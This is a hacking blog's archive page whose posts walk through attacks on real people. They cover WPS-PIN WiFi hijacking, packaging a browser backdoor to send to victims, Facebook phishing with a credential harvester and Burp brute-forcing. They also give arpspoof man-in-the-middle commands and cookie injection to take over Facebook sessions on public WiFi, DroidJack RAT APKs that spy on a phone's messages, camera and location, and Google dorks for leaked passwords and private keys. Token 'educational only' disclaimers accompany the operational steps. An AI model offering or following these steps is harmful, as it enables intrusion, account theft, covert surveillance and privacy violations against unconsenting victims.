Category Archives: Hacking

THIS BLOG WILL BE DISCONTINUED SOON : MOVING TO NEW ONE

REQUESTING ALL MY USERS, TO VISIT MY NEW BLOG at eBLOGGER with the same name
I.E MANISH HACKS.

Screenshot (371)

Due to some problems, i can’t continue posting on this Blog.

Pls Subscribe to my new Blog too to stay updated of the new Posts there, and also my Youtube Channel named Manish Hacks and don’t forget to hit the bell icon to stay updated via notification about my new video tutorials…

Visit my new Blog Now, Manish Hacks

Thank You!!!!

Hack Any WPA2/WEP/WPA Wifi Using Dumpper And Jumpstart [Latest Trick]

Step By Step Guide To Use WinPcap, Dumpper And JumpStart and Get Password:

Download the Dumper File Here

WinPcap: Download here

JumpStart: Download here

 

NOTE: You need to have Microsoft .NET Framework installed on your computer as well, or this will not work.

 

Disclaimer: I (The creator of the post has already stated this, but I’d like to go over it again) do not take any responsibility for your actions regarding this tutorial. This was made by the creator to demonstrate weaknesses in wireless networks and for educational purposes only. Breaching other people’s wireless networks without permission is against the law. If you want to test this tutorial, try it on your own home network.

2a

We will be using Dumpper and Jumpstart and other suites to hijack WPA2/WEP/WPA WiFi networks. It’ll let you join without a password, then you can get the password from inside the network. I’ll show you how towards the end of the tutorial. First, download all of the programs above. Now, follow these instructions for setting it up:

 

Note: Dont STOP the Process. It Takes Several Minutes . Probably 4~5 Hours.(Works Only in Laptops).

Update: We have also Added the Process to Hack Wifi in Desktops Below.

 

Hack WiFi with Dumpper and Jumpstart:

Download and install JumpStart, WinPcap, and Dumpper

Open Dumpper. It’ll be in Spanish, so go to the far right tab and select ‘English’ in between the other two options.Your programs are set up and ready to go, now begin the process:

 

  • In the ‘Networks’ tab, select the network adapter you wish to use. Hit the ‘Scan’ button now.
  • After it completes the scan, go over to the ‘Wps’ tab. In the area that says ‘Connect using JumpStart’, hit ‘Browse’ to select the location of where you installed JumpStart in the previous set-up steps. (By default, it installs in C:\Program Files (x86)\Jumpstart. Don’t open it, just select the ‘Jumpstart’ folder and click ‘OK’)
  • In the area ‘Show default pin’, select ‘All networks’ isntead of ‘Only known networks’.
  • Hit the ‘Scan’ button.
  • Select the network you wish to penetrate. Remember the ‘Pin’ corresponding to your network in the scan results, this will be needed for later.
  • In the previous area ‘Connect using Jumpstart’, hit the ‘Start JumpStart’ button.
  • Under ‘What do you want to do?’, select ‘Join a wireless network’ and hit ‘Next’
  • Under ‘Which setup method do you want to use?’, select “Enter the PIN from my access point” and enter the PIN next to your network in the scan section back in the previous scan results.
  • Finally, select the targeted network from before and hit ‘Next’.Now you’re happily connected to that WiFi network you just penetrated. Do you want to see the password so you can get on from other devices without doing this process? Sure! Follow these simple steps:
  • Open the menu where you join WiFi networks/view the network you’re connected to.
  • Right click on the network you just joined and hit ‘Properties’
  • Under the ‘Security’ tab, you can see the password, but it’s just dots. Check the ‘Show characters’ box under it.
  • The password will then reveal itself.

Done.

 

Hacking The Wifi on Desktops?
So Many People are Doing this Hack in their Desktops.But unfortunately Desktops are not compatible for using this Hack.But Don’t worry, Here is the trick to do the same Hacking process in Destops even. You just need to buy the Wireless Adapter and Install it in your desktop.

It is worth the product and it is only last thing you need. After getting the Product Proceed as Above to hack WiFi with Dumpper and Jumpstart.You will not regret it later for buying.

Doubts? Please use the comments section and feel free to ask any question. I will definitely get it solved.

 

HACK REMOTE PC USING BROWSER – JAVASCRIPT WEBSOCKET BACKDOOR

BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.

b1

BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket connections and creates a command-line interface for sending commands to the remote system.

The JavaScript backdoor in BrowserBackdoor can be used on all browsers that support WebSockets.

First clone BrowserBackdoorServer repository from github, to do so type:

https://github.com/IMcPwn/browser-backdoor.git

b2

Follow the below steps one by one:

cd client

npm install

b3

Now go to the client folder and open index.html file in leafpad and edit the following line now type your kali Linux ip screenshot is given below.

After finishing the above task it will create the Browser backdoor script folder for windows and Linux users

b5

Now type the following command step by step

npm install electron-packager -g

electron-packager . –all

b6

Now go to the server folder in browser-backdoor directory and the following command

Bundle install

b7

After that start browser backdoor by typing in terminal:

ruby bbsconsole.rb

Now send the Brwoserbackdoor-win32-x64 to the victim using any social engineering method when the victim clink on BrowserBackdoor file you can get the victim session example are given below.

Now type the session command to check the active session it will show you the session with id no.

Type the target command with session id to interact with current session sees the following example

Target 0

 Now if you want to more option type the help command you can get the list of all available command

b8

NOTE: This post is only to make people aware of this backdoor i.e. Educational purpose only.

 

CREDENTIALS HARVESTER ATTACK : HACK FACEBOOK

Do you know ,you can hack facebook password with one fake fb page(phishing).

a2
In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.

WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

Brute-Force Authentication Attack With Burp Suite

Authentication lies at the heart of an application’s protection against unauthorized access. If an attacker is able to break an application’s authentication function then they may be able to own the entire application.

1304956700brute_force

The following tutorial demonstrates a technique to bypass authentication using a simulated login page from the “Mutillidae” training tool. The version of “Mutillidae” we are using is taken from OWASP’s Broken Web Application Project. Find out how to download, install and use this project.

First, ensure that Burp is correctly configured with your browser.

In the Burp Proxy tab, ensure “Intercept is off” and visit the login page of the application you are testing in your browser.

a1

Return to Burp.

In the Proxy “Intercept” tab, ensure “Intercept is on”.

a2

In your browser enter some arbitrary details in to the login page and submit the request.

a3

The captured request can be viewed in the Proxy “Intercept” tab.

Right click on the request to bring up the context menu.

Then click “Send to Intruder”.

Note: You can also send requests to the Intruder via the context menu in any location where HTTP requests are shown, such as the site map or Proxy history.

a4

Go to the IntruderPositions” tab.

Clear the pre-set payload positions by using the “Clear” button on the right of the request editor.

Add the “username” and “password” parameter values as positions by highlighting them and using the “Add” button.

Change the attack to “Cluster bomb” using the “Attack type” drop down menu.

a5

Go to the “Payloads” tab.

In the “Payload sets” settings, ensure “Payload set” is “1” and “Payload type” is set to “Simple list”.

In the “Payload options” settings enter some possible usernames. You can do this manually or use a custom or pre-set payload list.

a6

Next, in the “Payload Sets” options, change “Payload” set to “2”.

In the “Payload options” settings enter some possible passwords. You can do this manually or using a custom or pre-set list.

Click the “Start attack” button.

a7

In the “Intruder attack” window you can sort the results using the column headers.

In this example sort by “Length” and by “Status”.

a8

The table now provides us with some interesting results for further investigation.

By viewing the response in the attack window we can see that request 118 is logged in as “admin”

a9

To confirm that the brute force attack has been successful, use the gathered information (username and password) on the web application’s login page.

a10

Account Lock Out

a11

In some instances, brute forcing a login page may result in an application locking out the user account. This could be the due to a lock out policy based on a certain number of bad login attempts etc.

Although designed to protect the account, such policies can often give rise to further vulnerabilities. A malicious user may be able to lock out multiple accounts, denying access to a system.

In addition, a locked out account may cause variances in the behavior of the application, this behavior should be explored and potentially exploited.

Verbose Failure Messages

a12

Where a login requires a username and password, as above, an application might respond to a failed login attempt by indicating whether the reason for the failure was an unrecognized username or incorrect password.

In this instance, you can use an automated attack to iterate through a large list of common usernames to enumerate which ones are valid.

A list of enumerated usernames can be used as the basis for various subsequent attacks, including password guessing, attacks on user data or sessions, or social engineering.

Scanning a login page

a13

In addition to manual testing techniques, Burp Scanner can be used to find a variety of authentication and session management vulnerabilities.

In this example, the Scanner was able to enumerate a variety of issues that could help an attacker break the authentication and session management of the web application.

 

SOURCE: PortSwigger

COOKIES STEALING: HACK FACEBOOK SESSIONS

Today we’ll be hacking Facebook profiles active on your local network.
You may think, “How is this useful, nobody but me is using my network.” Well, you can use this on other Wi-Fi networks that are available for free (like at Starbucks) and crack their precious Facebook profile!
 

a1

How?

We are going to use a well known method called “The cookie injection method.” This might be far off from becoming “elite”, but you need to get familiar with your Linux distribution first.

Step 1: Get the Right “Stuff”

For this hack, you’ll need a few things. Nothing special, but you’ll need these stuff.

My best suggestion is that you first install BackTrack, Kali Linux, or Bugtraq because they have almost everything we need.

For this little magic trick, we’ll need:

  • A working Linux distribution (preferably Kali, Backtrack or Bugtraq)
  • Wireshark (a packet sniffer)
  • Firefox (web browser)
  • Nmap (scanner)
  • Greasemonkey (addon for Firefox)
  • Cookie injector (script for Greasemonkey)*

Now let’s start doing some magic! :D*

Step 2: Network Scan

First, to actually connect to a target, we’ll need an IP address. In order to get that, you’ll need to do a network scan with Nmap. So go ahead and boot up your terminal and enter the following command:

  • nmap -F 192.168.xx.xx/24

Note: If this doesn’t work, use 10.0.x.x/24 instead.

This command will scan your network for any IP addresses connected to it. The -F gives the console the instruction to use “Fast mode.” If done correctly, you should see something like this:

 

a2

That’s how your Nmap scan should look like.

Step 3: Starting the “Man-in-the-Middle Attack”

Now we’re going to start a man-in-the-middle attack, MITM for short.

In MITM attack, we spoof our MAC address so that when a server responds, person sends a message to the other, he won’t be receiving that message, but he will receive messages that we send, as we’re the Man in the middle.

This might help you understand:

a3

A man-in-the-middle attack!

Starting the Attack

To start, enter the following command in a NEW terminal window:

  • sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

This will forward your IP address. Now we’re starting the MITM by opening a NEW terminal window and entering this command:

  • sudo arpspoof -i [Interface] -t [target] [default gateway]

If you don’t know your interface and default gateway, start a new terminal and enter: ipconfig.

a4

This is the result form the arpspoof.

Open (once again -_-) a new terminal window and enter the following command:

  • sudo arpspoof -i [interface] -t [default gateway] [target]

a5

Another result from the arpspoof!

Note: After you entered both the arpspoof commands DON’T CLOSE THE TERMINALS.

Step 4: Firefox and Wireshark (Almost Done!)

We need a few more things in order to complete this hack!

First install Firefox, then Greasemonkey and the cookie injector script. Then, install Wireshark, which you can do by entering this command into a terminal window:

  • sudo apt-get install wireshark

After that, open up a Wireshark session (open a terminal and enter sudo Wireshark as command). Select your interface and start capturing. At the top, you should see an input box where you can add filters. Now enter this filter:

  • http.cookie contains DATR

Now you should get a list in Wireshark. Search for a cookie that contains the text GET. Locate it, click on it with the left mouse button, select copy, select bytes, select printable text only.

a6

Wireshark result. The one you need is in the black circle.

Now go to Wireshark and go to Facebook. Make sure you’re NOT logged in. If you are, go to settings and delete all the cookies. Then go back to the Facebook log-in page, press [ALT]+C, and paste the cookie. Press OK and refresh the page.

a7

Here you can clearly see the cookie injector script input box.

If my magic worked, you should see the main Facebook timeline. If not, then you’ve done something wrong.

My Final Comments

This hack may seem advanced, but it’s actually really easy. Once you break down all the steps, it’s a piece of cake! 😀

Now that you’ve done this, it should be clear that Facebook security isn’t very strong 😛

Quick note: This only works if your target is actually browsing through Facebook over http (not https) at the time you’re doing the hack.

Note: All contents are provided for educational purposes only. 

External Links:

Greasemonkey: https://addons.mozilla.org/en-US/firefox/addon/748
HTTP Protocol: http://en.wikipedia.org/wiki/HTTP
TCP Protocol: http://en.wikipedia.org/wiki/TCP
Cookies: http://en.wikipedia.org/wiki/HTTP_cookie
Wireshark: http://www.wireshark.org/
Ettercap: http://ettercap.sourceforge.net/
ARP Poisoning: http://en.wikipedia.org/wiki/ARP_spoofing

 

How to Setup SSH Tunneling to Bypass a Firewall

Today, data breaches, hacking and snooping are happening frequently. Not a day goes by without news of a company’s database getting leaked or some government censoring or controlling more part of the internet. And there is always a Nigerian prince wanting your help to free his million dollar assets.

To protect your identity and other sensitive information from all these, you need to secure your browsing, especially when using a public WiFi network. The ideal solution is using a VPN which we have already covered on several instances.

b

But what if you are behind office, library or school firewall? While VPN will work (sometimes) but the services are paid and the free ones have dark sides. SSH tunnelling is one of the alternative to this which enables you to bypass a restrictive firewall without getting caught.

What is SSH Tunneling?

SSH tunnelling is a somewhat like VPN. In VPN, you connect to a VPN server and all your traffic is encrypted and gets routed through that server. The premise is same but instead of  a VPN server you have your home PC or router, acting as a server, for traffic routing and it takes few more steps to setup.

b1

For readers who like technical details, the client side computer will connect to an SSH server through port 22. Most firewalls allow communication over port 22, as it is the port used by HTTPS and cannot decipher what is being transmitted over the HTTPS connection as it’s encrypted. Also, SSH also uses the same port so most firewalls allow it. I say most because some really good ones can still catch it, for which, read the cautionary  below.

 

A Word of Caution
Before you starting poking in network settings at your workplace, do review its policy regarding this. Depending on the company, you will, at most, get a warning or worst get fired from a job. Moreover, if you work in company involving sensitive work like a government department or bank or nuclear power station, it is wise not to do this as it may lead to compromised security, leading to some of the aforementioned hacks. If an IT admin decides to inspect, he or she will only see traffic flowing via port 22 to and from your PC but will not be able to see what the traffic is due to encryption. So if you get caught and get rebuked for trying this, no fingers should be pointed at us.
Moreover, it’s not guaranteed that this method will penetrate all firewalls. Most firewalls allow this because they can’t differentiate between an SSH &  HTTPS packet. But a really sophisticated firewall will even sniff this out and block the connection.

 

The Server Side: FreeSSHD

In a VPN connection, you connect to a VPN server, in the same way in SSH tunnelling you need an SSH server. There are free SSH servers available but as our main concern here is security, it’s not wise to trust an unknown entity with your data. So we will be setting up a server on the home PC. Hosting an SSH server doesn’t require powerful guts so any old or low-cost PC is good enough for the job. FreeSSHD, a free app that is used. Let’s set it up.

Step 1: Download and install FreeSSHD. At the end of the installation, select Yes for Private Keys and select No for Do you want to run FreeSSHd as a system service.

Step 2: Open FreeSSHD and open the settings window by double clicking the icon in the taskbar. There should be a green tick indicating SSH server is running.

b4

Step 3: Click the Users tab > Add to add a new user. In the newly opened window, enter the username of your choice. In Password, select Password stored as SHA1 hash from the drop down menu and enter a password of your liking. Tick the check boxes for Shell &Tunneling.

b5

Step 4: In Encryption tab select AES(128,192 and 256 bits) option then click the SSH andTunneling tabs and modify the options as per the images below.

b6

Settings for SSH tab

b7

Settings for Tunneling Tab

The Client Side: PuTTY

To connect to the SSH server, a client app is required. For that, we will be using the awesome and free PuTTY client app. It’s simple and doesn’t require installation, perfect for work PCs which usually don’t let you install programs.

Download and open PuTTY. In the Host Name enter the IP address or hostname of the PC on which SSH server is running, select SSH under Protocol and click on Open. A black window will appear asking you to enter the username. This means the connection to the SSH server is successful. Enter the username you set in Step 3 followed by the password (which will not appear as you type).

b8

If you get connection refused or connection timed out error, follow the next steps to allow the port in Windows firewall.

Open the Windows firewall (on the FreeSSHD server PC) and go Advanced Settings. In the Advanced Settings window click on Inbound Rules > New Rule. Now follow the steps as per the screenshots below.

b9

Select Port for the type of rule.

b10

Select TCP and enter 22 for port number.

b11

Select Allow the connection.

b12Tick all the three options.

If you still get a connection error, try to ping your SSH server from CMD. If you get a request timed out message then most probably the firewall is tightly secured and, unfortunately, you can’t do anything.

How To Hack Android Smartphones Remotely using DroidJack To Get Full Access

I have alreday posted about How to Hack Android Phone using Metasploit as you can see how easily anyone can hack android smartphone using metasploit but the whole thing was in Linux and everyone is not used to work on Linux.

So, this post will show you How to hack Android Smartphones in Windows using Droid Jack .The whole process is GUI based and easy.

What is Droid Jack ?

download

Droid Jack is what you need for that. Droid Jack gives you the power to establish control over your beloveds’ Android devices with an easy to use GUI and all the features you need to monitor them.Droid Jack is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

NOTE: Here I’m using RAT[remote administration tool] software in windows for educational use ,all devices have been faked.This tutorial is for learning purposes only and should not be used for any illegal activities.It’s only for awareness.Don’t break someone privacy who not belongs to you , i’m not liable for any illegal activity…

Requirements :

  • PC running on Windows and Internet enabled.
  • Required JAVA and Net-framework Installed.

Features of this Android HACK :

  • Get contacts from remote android device.
  • Click snaps using front or back camera.
  • Get real-time pin point location.
  • Record real-time sound by using microphone of android device.
  • and lots more…….

Hack Android using Droid Jack

Step 1 : Download Droid Jack from here .

Step 2 : Now open Droid Jack.jar and create new .apk file form  “ Generate apk ” tab.Now edit fields , here i’m using

App name : stack4

File name : stack4

Dynamic DNS : 192.168.1.4 (lan ip)

Port : 1337 (you can use any port but it should be available or open for listening)

Bind with another apk : Leaving blank.You can bind this apk with another apk like whatsapp , viber , or any other android package.Here i’m not using this feature.

Stealth mode : Leaving blank.You can hide this app from launcher.Make it hidden.

Use custom icon : leaving blank.Use as  desired app icon.

1

Step 3 :  After successfully generating newly apk. Send it to Android device.

2

Step 4 : Now Click on ‘ Devices ‘ tab.Enter you port and turn on reception.

3

Step 5 : Open app in Android device.As soon as you open the app in the device, you can see the connected device in Droid jack device console.

See also : How to root android without PC

Step 6 : Now you have full access over victim device.You grab messages ,call log,pin point location , listen real time calls , access data from file manager and much more .

Known Bugs
Bug: Unable to Fetch Data from Device
Fix: Forward both your chosen port AND port 1334!
Status: Working

For full version software, mail me, or drop your e-mail in comments.

If you have any doubt about your device security ,please feel free to ask.

How to use Google.com to Find Usernames + Passwords

slide16

Prerequisites:

1. A modern webbrowser and a internet.
2. Time

Method 1: Facebook

We will be using a google dork to find usernames and passwords of many accounts including Facebook!

The Dork: intext:charset_ test= email= default_persist ent=

Enter that into Google, and you will be presented with several sites that have username and passwords lists!

Method 2: WordPress!

This will look for WordPress backup files Which do contain the passwords, and all data for the site!

The Dork: filetype:sql inurl:wp-conten t/backup

Method 3: WWWBoard!

This will look for the user and passwords of WWWBoard users

The Dork: inurl:/ wwwboard/ passwd.txt

Method 4: FrontPage!

This will find all users and passwords, similar to above.

The Dork: ext:pwd inurl:(service | authors | administrators | users)”# -FrontPage-“

Method 5: Symfony

This finds database information and logins

The Dork: inurl:config/ databases.yml -trac -trunk -“Google Code”-source -repository

Method 6: TeamSpeak

This will search for the server.dbs file
(A Sqlite database file With the SuperAdmin username and password)

The Dork: server-dbs”intitle:index of”

Method 7: TeamSpeak 2
This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for”superadmin account info:”

The Dork: “inurl:Teamspea k2_RC2/ server.log

Method 8: Get Admin pass
Simple dork which looks for all types of admin info

The Dork: “admin account info”filetype:log

Method 9: Private keys
This will find any .pem files which contain private keys.

The Dork: filetype:pem pem intext:private

And the Ultimate one, the regular directory full of passwords.

Method 10: The Dir of Passwords!
Simple one!

The Dork: intitle:”Index of..etc”passwd

ENJOY HACKING!

Use at your own risk!

Hack .rar files by using RAR Password Unlocker

rar-password-unlocker

Efficient and Secure WinRAR/RAR Password Recovery

RAR Password Unlocker is proved to be a helpful tool when you forgot WinRAR/RAR password and cannot open the RAR archives. It can recover RAR password at high speed via 3 attack options: Brute-force, Brute-force with user-defined Mask and Dictionary.

  • Support all RAR files created by any tools
  • Recover RAR password faster with SSE, etc.
  • Support multi-core CPU and GPU acceleration
  • 3 efficient password attack options available
  • Save password recovery process automatically
  • Shut down computer automatically after recovery

Key Features:

  • Powerful WinRAR Recovery Tool

Quickly recover forgotten passwords from encrypted RAR archives (*.rar) created by any applications, including the latest version of WinRAR. Unlock any password-protected RAR archive no matter what compression and encryption algorithm is used.

  • Recover Fast with GPU & Multi-core CPU

Recover RAR password at high speed by using advanced SSE technology and new search algorithm.

Allow you to accelerate RAR password recovery with Multi-core CPUs, NVIDIA CUDA GPUs and ATI OpenCL GPUs.

  • 3 Efficient Password Attack Options

Brute-force Attack – Try all possible password combinations when you have no idea about it.

Brute-force Attack with Mask – Greatly reduce the recovery time by specifying the forgotten password length, character set, etc. (High Recommended)

Dictionary Attack – Recover lost RAR password by trying the password combinations in the built-in dictionary as a password. Self-created dictionary in any language is also supported.

  • Search for Encrypted Files

Search feature helps you find your encrypted RAR archives easily and fast by scanning your PC. You can select the type of scan you want to use and scan specific files – from your entire computer system to one or two selected folders.

  • Auto -save Recovery State

Stop and resume your password recovery process anytime through the auto-save feature. This RAR password cracker can automatically save your password recovery state.

System Requirements:

OS: Windows 7/ Vista/XP/2008/2003/2000

CPU: 1 GHz processor (2.4 GHz is recommended)

RAM: 512 MB (1 GB is recommended)

Disk space: 15 MB of free space

Download full version from this link

Also Read: CRACK ANY RAR/ZIP FILE PASSWORD WITHOUT ANY SOFTWARE